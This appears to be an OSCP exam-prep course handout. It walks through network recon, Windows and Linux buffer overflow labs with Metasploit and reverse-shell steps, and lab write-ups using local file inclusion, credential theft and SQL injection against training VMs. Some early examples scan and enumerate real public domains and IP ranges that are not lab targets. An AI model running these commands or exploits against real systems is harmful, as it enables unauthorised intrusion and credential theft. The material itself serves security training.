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oscp_prep_class"/><text:bookmark-start text:name="__RefHeading___oscp_prep_class_1"/><text:bookmark-start text:name="oscp_prep_class"/>OSCP Prep class<text:bookmark-end text:name="__RefHeading___oscp_prep_class_1"/><text:bookmark-end text:name="oscp_prep_class"/></text:h>
      <text:p text:style-name="Text_20_body"><text:a xlink:type="simple" xlink:href="https://pastebin.com/raw/s59GPJrr" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://pastebin.com/raw/s59GPJrr</text:a></text:p>
      <text:p text:style-name="Preformatted_20_Text">Day 1: Exploit Research<text:line-break/>http://www.securitytube.net/groups?operation=view&amp;groupId=7<text:line-break/><text:line-break/>Day 2: Python Hacking<text:line-break/>https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner)<text:line-break/>https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist)<text:line-break/> <text:line-break/><text:s text:c="28"/>#################################<text:line-break/>----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------<text:line-break/><text:s text:c="28"/>#################################<text:line-break/> <text:line-break/><text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>cd /home/strategicsec/toolz<text:line-break/><text:line-break/>wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl<text:line-break/> <text:line-break/>perl blindcrawl.pl -d motorola.com<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>-- Take each IP address and look ip up here:<text:line-break/>http://www.networksolutions.com/whois/index.jsp<text:line-break/> <text:line-break/> <text:line-break/>Zone Transfer fails on most domains, but here is an example of one that works:<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>dig axfr heartinternet.co.uk<text:s text:c="2"/>@ns.heartinternet.co.uk<text:line-break/> <text:line-break/> <text:line-break/>cd ~/toolz/<text:line-break/><text:line-break/>wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c<text:line-break/> <text:line-break/>gcc ipcrawl.c -o ipcrawl<text:line-break/> <text:line-break/>chmod 777 ipcrawl<text:line-break/> <text:line-break/>./ipcrawl 148.87.1.1 148.87.1.254<text:s text:c="14"/><text:line-break/> <text:line-break/> <text:line-break/>sudo nmap -sL 148.87.1.0-255<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/> <text:line-break/> <text:line-break/>sudo nmap -sL 148.87.1.0-255 | grep oracle<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/><text:line-break/> <text:line-break/>########################<text:line-break/># Scanning Methodology #<text:line-break/>########################<text:line-break/> <text:line-break/>- Ping Sweep<text:line-break/>What's alive?<text:line-break/>------------<text:line-break/>sudo nmap -sP 157.166.226.*<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/> <text:line-break/><text:s text:c="4"/>-if -SP yields no results try:<text:line-break/>sudo nmap -sL 157.166.226.*<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/> <text:line-break/><text:s text:c="4"/>-Look for hostnames:<text:line-break/>sudo nmap -sL 157.166.226.* | grep com<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/> <text:line-break/> <text:line-break/>- Port Scan<text:line-break/>What's where?<text:line-break/>------------<text:line-break/>sudo nmap -sS 162.243.126.247<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/> <text:line-break/> <text:line-break/>- Bannergrab/Version Query<text:line-break/>What versions of software are running<text:line-break/>-------------------------------------<text:line-break/>sudo nmap -sV 162.243.126.247<text:line-break/><text:s text:c="5"/>strategicsec<text:line-break/> <text:line-break/> <text:line-break/>- Vulnerability Research<text:line-break/>Lookup the banner versions for public exploits<text:line-break/>----------------------------------------------<text:line-break/>http://exploit-db.com<text:line-break/>http://securityfocus.com/bid<text:line-break/>https://packetstormsecurity.com/files/tags/exploit/<text:line-break/><text:line-break/><text:line-break/><text:line-break/>##############################<text:line-break/># Scanning Process to follow #<text:line-break/>##############################<text:line-break/>Step 1: Ping Sweep<text:line-break/>------------------<text:line-break/>nmap -sP &lt;IP-ADDRESS-RANGE&gt;<text:line-break/>nmap -sL &lt;IP-ADDRESS-RANGE&gt;<text:line-break/><text:line-break/><text:line-break/>Step 2: Port Scan<text:line-break/>-----------------<text:line-break/>nmap -sS &lt;IP-ADDRESS&gt;<text:line-break/><text:line-break/><text:line-break/>Step 3: Bannergrab<text:line-break/>------------------<text:line-break/>nmap -sV &lt;IP-ADDRESS&gt;<text:line-break/>nmap -sV -p- &lt;IP-ADDRESS&gt;<text:line-break/><text:tab/>|<text:line-break/><text:tab/>----&gt; Vulnerability Research<text:line-break/><text:line-break/><text:line-break/>Step 4: Vulnerability Scan the webservers<text:line-break/>----------------------------------------- <text:line-break/>git clone https://github.com/sullo/nikto.git Nikto2<text:line-break/> <text:line-break/>cd Nikto2/program<text:line-break/> <text:line-break/>perl nikto.pl -h &lt;IP-ADDRESS&gt;<text:line-break/><text:line-break/><text:line-break/><text:line-break/>Step 5: Directory Bruteforce<text:line-break/>--------------------<text:line-break/>git clone https://github.com/v0re/dirb.git<text:line-break/> <text:line-break/>cd dirb/<text:line-break/> <text:line-break/>./configure<text:line-break/> <text:line-break/>make<text:line-break/> <text:line-break/>./dirb<text:line-break/> <text:line-break/>./dirb http://&lt;IP-ADDRESS&gt; wordlists/big.txt<text:line-break/><text:line-break/><text:line-break/><text:line-break/><text:line-break/><text:line-break/>Step 6: Bruteforce any services you find<text:line-break/>----------------------------------------<text:line-break/> root@kali:~# hydra -L username.txt -P passlist.txt ftp://&lt;IP-ADDRESS<text:line-break/> root@kali:~# hydra -l user -P passlist.txt ftp://&lt;IP-ADDRESS<text:line-break/><text:line-break/><text:line-break/><text:line-break/><text:line-break/><text:line-break/> <text:line-break/><text:s text:c="28"/>##############################<text:line-break/>----------- ############### # Day 2: Stack Overflow Labs # ############### -----------<text:line-break/><text:s text:c="28"/>##############################<text:line-break/> <text:line-break/> <text:line-break/><text:line-break/><text:line-break/><text:line-break/>#######################################<text:line-break/># Download the class virtual machines #<text:line-break/>#######################################<text:line-break/><text:line-break/>You can download the Exploit Dev VMs from the links below:<text:line-break/>https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip<text:line-break/>user:<text:tab/>Administrator<text:line-break/>pass: <text:tab/>strategicsec<text:line-break/><text:line-break/><text:line-break/>https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip<text:line-break/>user:<text:tab/>Administrator<text:line-break/>pass: <text:tab/>strategicsec<text:line-break/><text:line-break/><text:line-break/><text:line-break/>https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip<text:line-break/><text:s text:c="4"/>username: workshop<text:line-break/><text:s text:c="4"/>password: password<text:line-break/><text:line-break/><text:line-break/>Inside of your XP-ED-AttackHost VM please download this file and extract it to your Desktop:<text:line-break/>https://s3.amazonaws.com/StrategicSec-Files/ED-Workshop-Files.zip<text:line-break/><text:line-break/><text:line-break/><text:line-break/>#########################################<text:line-break/># Download this file on your windows VM #<text:line-break/>#########################################<text:line-break/>https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip<text:line-break/>https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip<text:line-break/><text:line-break/><text:line-break/><text:line-break/><text:line-break/>#####################################<text:line-break/># Quick Stack Based Buffer Overflow #<text:line-break/>#####################################<text:line-break/> <text:line-break/>- You can download everything you need for this exercise (except netcat) from the link below<text:line-break/>https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip<text:line-break/> <text:line-break/>- Extract this zip file to your Desktop<text:line-break/> <text:line-break/>- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe<text:line-break/> <text:line-break/>- Open a new command prompt and type:<text:line-break/>nc localhost 9999<text:line-break/> <text:line-break/>- In the new command prompt window where you ran nc type:<text:line-break/>HELP<text:line-break/> <text:line-break/>- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts<text:line-break/>- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++<text:line-break/> <text:line-break/>- Now double-click on 1-simplefuzzer.py<text:line-break/>- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.<text:line-break/> <text:line-break/> <text:line-break/>- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.<text:line-break/> <text:line-break/>- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -&gt; 'Attach' and attach to process vulnserv.exe<text:line-break/> <text:line-break/>- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.<text:line-break/> <text:line-break/>- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).<text:line-break/> <text:line-break/>- Now isolate the crash by restarting your debugger and running script 2-3000chars.py<text:line-break/> <text:line-break/>- Calculate the distance to EIP by running script 3-3000chars.py<text:line-break/>- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338<text:line-break/> <text:line-break/>4-count-chars-to-EIP.py<text:line-break/>- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)<text:line-break/>- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it<text:line-break/> <text:line-break/>5-2006char-eip-check.py<text:line-break/>- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242<text:line-break/> <text:line-break/>6-jmp-esp.py<text:line-break/>- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll<text:line-break/> <text:line-break/>7-first-exploit<text:line-break/>- In this script we actually do the stack overflow and launch a bind shell on port 4444<text:line-break/> <text:line-break/>8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.<text:line-break/> <text:line-break/> <text:line-break/>------------------------------<text:line-break/> <text:line-break/>cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc<text:line-break/> <text:line-break/>vi vulnserv.rb<text:s text:c="4"/>(paste the code into this file)<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>cd ~/toolz/metasploit<text:line-break/> <text:line-break/>./msfconsole<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>use exploit/windows/misc/vulnserv<text:line-break/>set PAYLOAD windows/meterpreter/bind_tcp<text:line-break/>set RHOST 192.168.88.129<text:line-break/>set RPORT 9999<text:line-break/>exploit<text:line-break/><text:line-break/>---------------------------------------------------------------------<text:line-break/>Day 1 Challenge:<text:line-break/><text:line-break/>Write an exploit for FreeFloat FTP - make sure that it is broken up into multiple scripts like the vulnserver exploit is.<text:line-break/>https://www.exploit-db.com/apps/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip<text:line-break/><text:line-break/><text:line-break/>Reference scripts for FreeFloat FTP:<text:line-break/>https://www.exploit-db.com/exploits/40711/<text:line-break/>https://www.exploit-db.com/exploits/40681/<text:line-break/>https://www.exploit-db.com/exploits/40677/<text:line-break/>https://www.exploit-db.com/exploits/40674/<text:line-break/>https://www.exploit-db.com/exploits/40673/<text:line-break/>https://www.exploit-db.com/exploits/40672/<text:line-break/>https://www.exploit-db.com/exploits/24479/<text:line-break/><text:line-break/><text:line-break/><text:line-break/><text:line-break/>##################<text:line-break/># Linux Exploits #<text:line-break/>##################<text:line-break/> <text:line-break/>The target virtual machine for these labs can be downloaded from here:<text:line-break/>https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip<text:line-break/>root: exploitlab<text:line-break/>user: exploitlab<text:line-break/>pass: exploitlab<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>The attack scripts can be downloaded from here:<text:line-break/>https://s3.amazonaws.com/secureninja/files/peercast_skel.zip<text:line-break/>https://s3.amazonaws.com/secureninja/files/dproxy.zip<text:line-break/>https://s3.amazonaws.com/secureninja/files/asterisk.zip<text:line-break/> <text:line-break/> <text:line-break/>######################################<text:line-break/># Lab 1: Simple Linux Stack Overflow #<text:line-break/>######################################<text:line-break/>Login to the asterisk VM with the username/password of (exploitlab/exploitlab)<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>cat victim1.c<text:line-break/>gcc victim1.c -o victim1<text:line-break/>./victim AAAAAAAAAAAAAAAAAAA<text:line-break/>./victim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>gdb -core core.xxxx<text:line-break/>info registers<text:line-break/>x/64x $esp<text:line-break/>quit<text:line-break/> <text:line-break/> <text:line-break/>/usr/local/sbin/peercast<text:line-break/> <text:line-break/><text:s text:c="4"/>-open peercast1.py on the XP attack-<text:line-break/>python peercast1.py | nc asterisk-vm-ip 7144<text:line-break/> <text:line-break/>gdb -core core.xxxx<text:line-break/>info registers<text:line-break/>x/64x $esp<text:line-break/>quit<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>/usr/local/sbin/peercast<text:line-break/> <text:line-break/><text:s text:c="4"/>-open peercast2.py-<text:line-break/>python peercast2.py | nc asterisk-vm-ip 7144<text:line-break/> <text:line-break/>gdb -core core.xxxx<text:line-break/>info registers<text:line-break/>x/64x $esp<text:line-break/>quit<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/><text:s text:c="4"/>- SSH into the Ubuntu Host (strategicsec:strategicsec) -<text:line-break/>cd /home/strategicsec/toolz/metasploit/tools/exploit<text:line-break/> <text:line-break/><text:s text:c="4"/>Now we will run the pattern offset with ruby:<text:line-break/> <text:line-break/>ruby pattern_offset.rb 42306142<text:line-break/><text:s text:c="3"/><text:line-break/><text:s text:c="4"/>and<text:line-break/><text:s text:c="3"/><text:line-break/>ruby pattern_offset.rb 61423161<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/><text:s text:c="4"/>Distance to EIP is 780<text:line-break/><text:s text:c="4"/>Relative position of ESP 784<text:line-break/> <text:line-break/>Now to find a good JMP ESP address with msfelfscan<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>cd /home/strategicsec/toolz/metasploit/<text:line-break/>./msfelfscan -j ESP binaries/peercast_binary<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/><text:s text:c="4"/>0x0808fb57<text:s text:c="3"/>jmp esp &lt;----- we will use this one!<text:line-break/><text:s text:c="4"/>0x0808fcc7<text:s text:c="3"/>jmp esp<text:line-break/><text:s text:c="4"/>0x0808ffff<text:s text:c="3"/>jmp esp<text:line-break/><text:s text:c="4"/>0x08090057<text:s text:c="3"/>jmp esp &lt;----- we can't use this one.<text:line-break/><text:s text:c="4"/>0x080901df<text:s text:c="3"/>jmp esp<text:line-break/> <text:line-break/> <text:line-break/>Now open and edit peercast3.py in notepad++ on our XP Host machine.<text:line-break/><text:s text:c="4"/>pad_lenth = the distance to EIP<text:line-break/><text:s text:c="4"/>ret_address =<text:s text:c="2"/>the jmp esp we are using<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>python peercast3.py | nc asterisk-vm-ip 7144<text:line-break/> <text:line-break/>gdb -core core.xxxx<text:line-break/>info registers<text:line-break/>x/64x $eip<text:line-break/>x/10i $eip<text:line-break/>quit<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode<text:line-break/> <text:line-break/><text:s text:c="4"/>Linux IA32 Reverse Shell<text:line-break/><text:s text:c="4"/>LHOST (Listening Host) – the IP of your XP host machine ipconfig /all<text:line-break/><text:s text:c="4"/>LPORT (Listening Port) – chose a port to run your listener on<text:line-break/><text:s text:c="4"/>Encoder: Alpha2<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/> <text:line-break/>nc -l -p 4321<text:line-break/>python peercast4.py | nc asterisk-vm-ip 7144<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/><text:s text:c="28"/>###########################<text:line-break/>----------- ############### # Day 3: Attack Lab Hosts # ############### -----------<text:line-break/><text:s text:c="28"/>###########################<text:line-break/> <text:line-break/><text:line-break/><text:line-break/>#########################<text:line-break/># Class Virtual Machine #<text:line-break/>#########################<text:line-break/> <text:line-break/> <text:line-break/>Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:<text:line-break/> <text:line-break/>https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip<text:line-break/>user:<text:s text:c="6"/>infosecaddicts<text:line-break/>pass:<text:s text:c="6"/>infosecaddicts<text:line-break/> <text:line-break/> <text:line-break/>Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.<text:line-break/> <text:line-break/> <text:line-break/>To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:<text:line-break/>https://54.245.178.32/?src=connect<text:line-break/> <text:line-break/> <text:line-break/>Accept the security exception and enter one of the following user names:<text:line-break/> <text:line-break/>username: labuser001<text:s text:c="7"/><text:line-break/>username: labuser002<text:line-break/>username: labuser003<text:line-break/>username: labuser004<text:line-break/>username: labuser005<text:line-break/>username: labuser006<text:line-break/>username: labuser007<text:line-break/>username: labuser008<text:line-break/>username: labuser009<text:line-break/>username: labuser010<text:line-break/>username: labuser011<text:line-break/>username: labuser012<text:line-break/>username: labuser013<text:line-break/>username: labuser014<text:line-break/>username: labuser015<text:line-break/>username: labuser016<text:line-break/>username: labuser017<text:line-break/>username: labuser018<text:line-break/>username: labuser019<text:line-break/>username: labuser020<text:line-break/> <text:line-break/>----------------------------------------------------------------------------------------------------------------------------------------<text:line-break/> <text:line-break/>Mr. McCray will provide you with the password for the usernames above once the training session starts.<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>The target network range is:<text:line-break/>172.31.2.0/24<text:line-break/> <text:line-break/> <text:line-break/>You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>----------------------------------------------------------------------------------------------------------------------------------------<text:line-break/>Some tools to install:<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c<text:line-break/>gcc propecia.c -o propecia<text:line-break/>sudo cp propecia /bin<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 1: Portscan the server<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>sudo nmap -sS 172.31.2.139<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>Step 2: Version scan the server<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>sudo nmap -sV -p22,80 172.31.2.139<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 3: Vulnerability scan the webserver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139<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 4: Directory brute-force the webserver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139 wordlists/big.txt<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>----------------------------------------------------------------------------------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Attack steps:<text:line-break/>-------------<text:line-break/> <text:line-break/> <text:line-break/>Step 1: Ping sweep the target network<text:line-break/>-------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>nmap -sP 172.31.2.0/24<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>Found 4 hosts:<text:line-break/>172.31.2.47<text:line-break/>172.31.2.47<text:line-break/>172.31.2.157<text:line-break/>172.31.2.217<text:line-break/> <text:line-break/> <text:line-break/>Step 2: Port scan target system<text:line-break/>-------------------------------<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>sudo nmap -sV 172.31.2.47<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>PORT<text:s text:c="4"/>STATE<text:s text:c="4"/>SERVICE VERSION<text:line-break/>22/tcp<text:s text:c="2"/>open<text:s text:c="5"/>ssh<text:s text:c="5"/>OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)<text:line-break/>80/tcp<text:s text:c="2"/>open<text:s text:c="5"/>http<text:s text:c="4"/>Apache httpd 2.2.22 ((Ubuntu))<text:line-break/>514/tcp filtered shell<text:line-break/>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 3: Vulnerability Scan the webserver<text:line-break/>----------------------------------------<text:line-break/> <text:line-break/> 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47<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Step 4: Run dirbuster or similar directory bruteforce tool against the target<text:line-break/>-----------------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl<text:line-break/> <text:line-break/>perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 5: Browse the web site to look for clues<text:line-break/>---------------------------------------------<text:line-break/>Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself<text:line-break/> <text:line-break/> <text:line-break/>http://172.31.2.47/test<text:line-break/>http://172.31.2.47/test.php (got the following error message)<text:line-break/><text:s text:c="4"/>'file' parameter is empty. Please provide file path in 'file' parameter<text:line-break/> <text:line-break/>Figured this was a Local File Include (LFI) so I tried:<text:line-break/><text:s text:c="4"/>http://172.31.2.47/test.php?file=/etc/passwd<text:line-break/><text:s text:c="4"/>http://172.31.2.47/test.php?file=/etc/passwd%00<text:line-break/> <text:line-break/>None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)<text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>http://172.31.2.47/a<text:line-break/>http://172.31.2.47/b<text:line-break/>http://172.31.2.47/c<text:s text:c="2"/>(a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"<text:line-break/> <text:line-break/>So let's try that POST request with curl to pull down the c.php config file.<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php<text:line-break/>curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php<text:line-break/>curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/>&lt;?php<text:line-break/>#header( 'Z-Powered-By:its chutiyapa xD' );<text:line-break/>header('X-Frame-Options: SAMEORIGIN');<text:line-break/>header( 'Server:testing only' );<text:line-break/>header( 'X-Powered-By:testing only' );<text:line-break/> <text:line-break/>ini_set( 'session.cookie_httponly', 1 );<text:line-break/> <text:line-break/>$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");<text:line-break/> <text:line-break/>// Check connection<text:line-break/>if (mysqli_connect_errno())<text:line-break/><text:s text:c="2"/>{<text:line-break/><text:s text:c="2"/>echo "connection failed -&gt;<text:s text:c="2"/>" . mysqli_connect_error();<text:line-break/><text:s text:c="2"/>}<text:line-break/> <text:line-break/>?&gt;<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>ssh -l billu 172.31.2.47<text:line-break/><text:s text:c="4"/>b0x_billu<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>http://172.31.2.47/phpmyadmin<text:line-break/>http://172.31.2.47/phpMyAdmin<text:line-break/>http://172.31.2.47/pma<text:line-break/>http://172.31.2.47/phpmy<text:line-break/> <text:line-break/> <text:line-break/>Then I Googled config file name for phpmyadmin (config.inc.php)<text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php<text:line-break/>-----------------------------------------------------------------------<text:line-break/>&lt;?php<text:line-break/> <text:line-break/>/* Servers configuration */<text:line-break/>$i = 0;<text:line-break/> <text:line-break/>/* Server: localhost [1] */<text:line-break/>$i++;<text:line-break/>$cfg['Servers'][$i]['verbose'] = 'localhost';<text:line-break/>$cfg['Servers'][$i]['host'] = 'localhost';<text:line-break/>$cfg['Servers'][$i]['port'] = '';<text:line-break/>$cfg['Servers'][$i]['socket'] = '';<text:line-break/>$cfg['Servers'][$i]['connect_type'] = 'tcp';<text:line-break/>$cfg['Servers'][$i]['extension'] = 'mysqli';<text:line-break/>$cfg['Servers'][$i]['auth_type'] = 'cookie';<text:line-break/>$cfg['Servers'][$i]['user'] = 'root';<text:line-break/>$cfg['Servers'][$i]['password'] = 'roottoor';<text:line-break/>$cfg['Servers'][$i]['AllowNoPassword'] = true;<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>ssh -l root 172.31.2.47<text:line-break/><text:s text:c="4"/>roottoor<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>---------------------------------------------------------------------------------------------------------------------------------------------------------<text:line-break/> <text:line-break/>Attack steps:<text:line-break/>-------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 1: Ping sweep the target network<text:line-break/>-------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>nmap -sP 172.31.2.0/24<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>- Found 3 hosts<text:line-break/>172.31.2.64<text:line-break/>172.31.2.217<text:line-break/>172.31.2.238<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 2: Port scan target system<text:line-break/>-------------------------------<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>nmap -sV 172.31.2.64<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>-------------Scan Results--------------------------------------------<text:line-break/>PORT<text:s text:c="5"/>STATE<text:s text:c="4"/>SERVICE VERSION<text:line-break/>22/tcp<text:s text:c="3"/>open<text:s text:c="5"/>ssh<text:s text:c="5"/>OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)<text:line-break/>80/tcp<text:s text:c="3"/>open<text:s text:c="5"/>http<text:s text:c="4"/>Apache httpd 2.4.7 ((Ubuntu))<text:line-break/>514/tcp<text:s text:c="2"/>filtered shell<text:line-break/>1037/tcp filtered ams<text:line-break/>6667/tcp open<text:s text:c="5"/>irc<text:s text:c="5"/>ngircd<text:line-break/>Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel<text:line-break/>--------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Step 3: Vulnerability Scan the webserver<text:line-break/>----------------------------------------<text:line-break/> <text:line-break/> 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64<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>Step 4: Run dirbuster or similar directory bruteforce tool against the target<text:line-break/>-----------------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/>---------------------------Type This-----------------------------------<text:line-break/>wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl<text:line-break/> <text:line-break/>perl Webr00t.pl -h 172.31.2.64 -v<text:line-break/>-----------------------------------------------------------------------<text:line-break/> <text:line-break/> <text:line-break/> <text:line-break/>Step 5: Browse the web site to look for clues<text:line-break/>---------------------------------------------<text:line-break/>Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself<text:line-break/> <text:line-break/> <text:line-break/>..... really didn't get much from here so we just opened the web page in a browser<text:line-break/>http://172.31.2.64/<text:line-break/> <text:line-break/>.....browsed to the webpage and saw that it pointed to:<text:line-break/>http://172.31.2.64/jabc<text:line-break/> <text:line-break/>....clicked on documentation link and found hidden text that pointed to here:<text:line-break/>http://172.31.2.64/jabcd0cs/<text:line-break/> <text:line-break/>....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:<text:line-break/>https://www.exploit-db.com/exploits/32075/<text:line-break/> <text:line-break/>Tried the sql injection described in exploit-db:<text:line-break/>http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user UNION SELECT 